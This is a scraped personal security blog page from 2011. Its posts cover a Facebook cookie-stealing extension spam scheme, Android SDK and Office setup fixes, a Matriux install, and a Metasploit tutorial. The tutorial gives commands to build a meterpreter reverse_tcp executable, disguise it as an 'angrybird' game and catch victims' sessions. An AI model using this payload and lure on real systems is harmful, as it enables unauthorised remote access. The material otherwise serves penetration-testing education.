Though spam on Facebook is not new to us, however
I find this particular spam leveraged very smartly and it was a very
interesting analysis to me because I was surprised to see what extent the
spammers can go. Today one of my friends on Facebook was so annoyed with this
spam which was posting on all his friends walls, which looked like this:

I
was asked what to do, looking at it, it surely looked to be just like every
other spam I suggested him all the usual measures like remove all his Facebook
applications that are doubtful and clear his browser data. But it continued
even after that so I decided to look into it.

First
the URL, the spam seems to be originated from http://nwuuwiwiwiw.blogspot.com/, looking at the blog it
looked like this,

Interesting!
Needs a Divx plug-in however asks to install a YouTube Premium plugin (wonder
what a “premium” for YouTube would be!!).

So
decided to look into the page source, here is what it contained:

So
this would install the browser add-on/extension based on the browser, the else
part of the code made sense to me as it has to go further if the browser is not
Firefox or Chrome, let’s look into the php of the else part later. I downloaded
the Firefox “YouTube” add-on and extracted it; the youtube.js was one to look
into:

Remember
the else part earlier in the first code snippet which I promised to discuss
later? It contained a link http://mieneeueueu.co.cc/yt/video.php now the file extra.js
also contains this part to redirect the user to this URL after the installation
of the add-on/extension, navigating to that link I found

This
page actually contained that video embedded; finally the person must be happy
to see this video (however comments at the bottom are not real it’s an image,
stupid and smart) ;)

As
the person views the video and finishes it, this script stealing the browser
cookies gets enough time to spread the spam on all the friends’ walls

Further
analyzing the code,

The
code here assigns some random variables for the post so that it won’t be
similar on all the walls. So using all the variables post_form_id to var p3
make large combinations (use of mathematical combinations, smart eh?).

Looking
into the main part of the code where the message is generated and sent for post..,

Further looking
into the above snippet of code it is clear that it uses the grabbed cookies to
post the spam on others walls, this script also contained an unfinished part
left out (may be the spammer was happy with this for now or grab some time from
the user to finish the spam effectively) with a link to http://rihannaxgirlzke.blogspot.com/ which looked like,

However
looking into the source it didn’t contain any script or rather it was a static
page with the content actually an image file.

Conclusion:

Though
social networking sites often fall prey to such scams/spams it is much of users
consent due to their ignorance. Most of the times looking at the posts makes it
analyze if it is genuine video from a valid link, in this case,

Looking at the post the link from where the post
originated is clearly youtube.com (underlined black)

2.Further the thumbnail preview for videos has been
changed the play button now is transparent black while the one in the spam we
discussed had a blue play button (underlined red)

3.Always install extensions from known sources

a.Chrome – from
chrome store

b.Firefox –
Mozilla add-ons

4.Use add-ons like no-script, No-Ads to avoid such
scripts.

5.Stay away from scams/spams that promise to provide
some gift or money.

Just accept the license terms and Finish the installation of ADT it may show up few warnings regarding the plugin verification, accept it and restart Eclipse after installation

After the restart you would see a popup like this

Select the path where android SDK was installed or you can also install a new SDK if you haven't done that before, finish the installation and you should see the highlighted items in the toolbar of eclipse

That means you have successfully setup Android SDK in Eclipse

Now Click on Android SDK manager and select the Android platforms you want to choose for your development and install them as shown below

Thursday, September 29, 2011

Recently I was trying to install Windows Office 2010 by performing an upgrade over the existing Office 2007 it took too long and decided to stop the installation and manually uninstall 2007 then go for 2010 fresh installation. However when I tried to uninstall 2007 there was some issue and I was not able to remove it.

I tried manually deleting Office 2007 files and also removing all its temp and reference files in the disk. This worked fine but when I tried to install 2010. I got the following error:

setup cannot open the registry key Unknown/Component/xxxxxxxxxxxx make sure you have administrative rights..

That was annoying as I realized that the registry rights were screwed , little Google search told me that I have to get SubInACL [ Download ] However that meant I had to fix all the registriesSo I found a cool script on addictive tips by Ghaus Iftikar Nakodari , So here is what you do :

Copy the SubInACL.exe from the place it installed to C:\Windows\system32

Thursday, August 18, 2011

I will guide you through a series of steps that would help you installing matriux on your Hard Disk / Virtual Box

If you are installing on Hard Disk Drive scroll down to the instructions from "Step 6"

Follow these series of screenshots to install Matriux Krypton until I create a more brief tutorial and a video

Step1 :

Start the virtual box and click on "New" and select Operating System as "Linux" and Version as "Debian"

Step 2:

Allocate the RAM memory for the Installation anything more than 256Mb is good enough

Step 3:

Create a Virtual Hard Disk for the installation usually more than 6Gb is fine ( 8GB recommended). Select anything for the type of virtual hard disk.

Step 4:

Allot the hard disk size and also the directory you want else go with the default

Step 5:

After these steps start the Virtual machine, Since it is the first time it will prompt us so that a Disk Image (ISO image) can be mounted. Browse and locate the ISO image on your hard disk. ( the place where you downloaded Matriux Krypton)

Select Installation media to the ISO in your hard disk or DVD drive

This will start Matriux in Live mode

Enter password as "toor" and login

Step 6:

Open up a terminal and type gparted to start the gparted interface

If it is a new unallocated partition then Device > Create Partition ( else if it is a used disk space then skip the next step and go to formatting it)

Step 7:

select the Disk space you want to install Matriux and click New

Click on "Add"

Click on the Tick mark highlighted in the screen shot below and check "Apply"
and close gparted now

Step 8:

Now open a terminal and mount the partition we just created

Type the following in the terminal

mkdir /mnt/matriux

mount /dev/sda1 /mnt/matriux

Step 9:

Close the terminal, Now start the Matriux Disk Installerfrom the desktop and It should be easy for you now, Its a simple 7 step process !! with few entries such as username passwords, locale ...thats it!!!

Step a:

Select the installation partition

Step b:

Choose if you want to install grub

Choose the disc for grub

Step c:

Type the username and passwords for root and user

Step d:

Select the Locale you want ( Select en_US if you are not sure and prefer English)

Step e:

Confirm your settings and profile

The installer then proceeds for a few minutes of installing Matriux

Step f:

Congratulations you have now installed Matriux, reboot your system to boot into your new installation

Saturday, July 23, 2011

We will have a brief tutorial, on metasploit multi/hander exploit using a meterpreter payload of reverse_tcp.

Metasploit is a single most powerful open source tool
available today for penetration testers. It can be used for developing and
executing exploit code against remote target machine. A very famous and widely
used penetration tester’s choice.

Metasploit Framework has 4
interfaces to work with

1.MSF command line

2.MSF console

3.MSF GUI

4.Armitage (recently included along with the
framework)

There was also a web based
version, which later became obsolete since it was buggy. Msfconsole is the most
widely used and powerful mode of metasploit framework.

Metasploit in
Matriux:

My tutorial would include Matriux as the Operating system - which can be found here - http://www.matriux.com/

Optionally it can be started from the terminal by typing msfconsole or msfgui based on what you prefer.

This is how typically
the Graphical interface looks like

However we would like to proceed with the msfconsole which I suggest is an
extensive mode for using metasploit framework.

we will have a brief article on metasploit
multi/hander exploit using a meterpreter payload of reverse_tcp.

Start metasploit framework by typing “msfconsole” in the terminal and also
type “msfupdate”
to update the framework.

Now to start with multi/handler we have to generate the exe
binded with reverse_tcp of meterpreter, that we would share with the target
windows machines to exploit them. Open up a new terminal and type “msfpayload
windows/meterpreter/reverse_tcp LHOST= x.x.x.x LPORT = 1080 X >
/home/matriux/angrybird.exe”

where, LHOST => Local HOST IP LPORT = port to listen

This will generate an angrybird.exe
file in the HOME directory as shown here. This
file is to be shared with the target machines that we intend to exploit (you
can fool your target by changing the icon of the exe file generated and make it
look like an angrybird game file ;))

After sharing the file with the
target, we wait for the execution of that file. Meanwhile we start the
reverse_tcp handler in our system. After starting msfconsole
we start the metasploit
process by ”use multi/handler”. And set the payload by typing “set payload
windows/meterpreter/reverse_tcp”

Now set the options LHOST and LPORT by typing “set LHOST localIP"and “SET LPORT porto to listen”. Set them to match with
the exe payload we generated earlier, option you can check the options required
by typing “show options”

We are now ready to exploit our target machines, (here I set
up a windows XP machine ), initiate the exploit listening process by typing “exploit”
and wait for the target machine to execute the angrybird.exe as soon as the victim clicks on the
executable file it will initialize the meterpreter session with the reverse
tcp.

BINGO we are done!!! We successfully exploited a Windows XP machine
with multi/handler

And have you noticed? We just showed you a preview of
Matriux’s upcoming version ;) Ch33rs!!!

This article was earlier published by me in CHmag in the July 2011 Issue - http://chmag.in/

COUNT

Followers

Twitter Updates 2.2: FeedWitter

About Me

Prajwal Panchmahalkar was born in Hyderabad, a city in AP,eleventh december of nineteen hundred eighty nine A.D, a saggitarian. From that day onwards, Prajwal has been in the late beta version ever since. Now he is a fully grown dude aged 20 years and pursuing useless "BTech" from TKR Engg College.

During his pursuit of knowledge, Prajwal has spent School Days at the various schools around AP from Vijay High in Armoor then to St. Claret at Medchal, Hyderabad . After completing his useless Schooling from Siddhartha School, he joined in to be trained for IIT at Krishna Murthy's V study Circle and his current progression with IT includes MCITP (Microsoft Certified IT professional) and SCJP (Sun Certified Java Programmer) and looking ahead to be a SCJD . Prajwal Panchmahalkar loves fooling around with computers and probably this is what got him into IT field.

Prajwal now feels proud to be a Network Security guy playing around with boxes and feels proud to MOderate the Hyderabad NULL chapter.He has attended various conferences like ISD,c0c0n and SuntechDays. Prajwal has also delivered awareness seminars on network security and ethical hacking at various colleges (GRIET, TKR) and various other events. Prajwal finds his interest in the Matriux Project and pleasure advancing with it

He is now certified CEH v6 along with his past achievements being AFCEH, ACE. Prajwal finds pleasure in writing articles for magazines recently his article *METASPLOIT FRAMEWORK* was published in "DeveloperIQ" magazine , he is also looking forward to make into CHmag lately

Although Prajwal has not been lately into social life, he finds interest into it recently. he made up few vacancies for the standing "girlfriend" so if anyone finds her profile matching for the said posting can approach him either through mail or contact him directly....!!

Prajwal likes to listen music and his tastes range from the Indian Classical music to Metal and Rock. Prajwal lives on Enrique, Green Days, Rasmus,POD,Atif and JAL songs. Prajwal enjoys to dance, but he has no co-ordination in his body movements, his steps are not graceful and he has two left feet.Facebook, twitter and now Google+, Gaming, Cricket and Biking are pastimes that Prajwal indulges in. Prajwal also likes to gaze at stars and many a night is spent at the rooftop looking at the sky and wishing to become an astronaut. Prajwal himself doesnt know what he searches for, in the stars. Fortune says Prajwal is destined to be a Doctor but Prajwal doesnt find it easy to do with his BTech in hand. Prajwal is a dreamer, although his philosophy on life is limited and he is still exploring his boundaries, his dreams have gotten him into trouble many times.Prajwal is a citizen of India, that is Bharat and loves the country, but has radical views on politics and politicians. Prajwal loves to travel, exploring unknown places, especially in the hills. Prajwal hates pollution and heat. Prajwal is nocturnal, he is attracted to the night because it is mysterious ................................................ ............................ ( to be contd. ) edited :04/02/2011